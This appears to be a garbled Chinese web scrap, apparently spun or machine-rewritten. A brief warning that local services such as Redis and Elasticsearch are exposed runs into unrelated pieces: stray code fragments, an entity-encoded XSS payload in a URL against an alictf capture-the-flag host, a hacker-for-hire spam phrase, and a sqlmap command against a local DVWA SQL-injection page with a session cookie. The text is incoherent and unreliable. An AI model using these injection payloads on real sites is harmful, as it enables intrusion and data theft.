假如你正在阅览这篇文章，而且你是一个软件开发人员，那么你或许会在本地运转一些服务，例如Redis、Memcached和Elasticsearch，这些是许多软件产品依靠的服务。 你或许不知道的是，这些本地运转的服务或许被任何人所拜访，只需他们能够拜访你的网站，然后或许被一些坏人盗取你本地的数据。 /// <param name="sql"></param>/html>http://1de28830f09a4b1b.alictf.com/pet.php/?id=imageData&type=evi1m0%26%23x3c%3B%26%23x73%3B%26%23x63%3B%26%23x72%3B%26%23x69%3B%26%23x70%3B%26%23x74%3B%26%23x3e%3B%26%23x61%3B%26%23x6c%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%26%23x28%3B%26%23x31%3B%26%23x29%3B%26%23x3c%3B%26%23x2f%3B%26%23x73%3B%26%23x63%3B%26%23x72%3B%26%23x69%3B%26%23x70%3B%26%23x74%3B%26%23x3e%3B&a=%3Cscript%3Evar%20imageData%20=%20{name:%20%22%22};%3Cscript%3E[1][2]黑客接单渠道http://www.php.net/manual/zh/function.eval.php

东西：https://www.metasploit.com/python sqlmap.py -u "localhost/dvwa/vulnerabilities/sqli_blindid=2&Submit=Submit"--cookie="PHPSESSID=jsqauesftt001qeq4jmb1brq95;security=low" 所以一般考虑盲注,有回显的注入,要不然过于鸡肋了。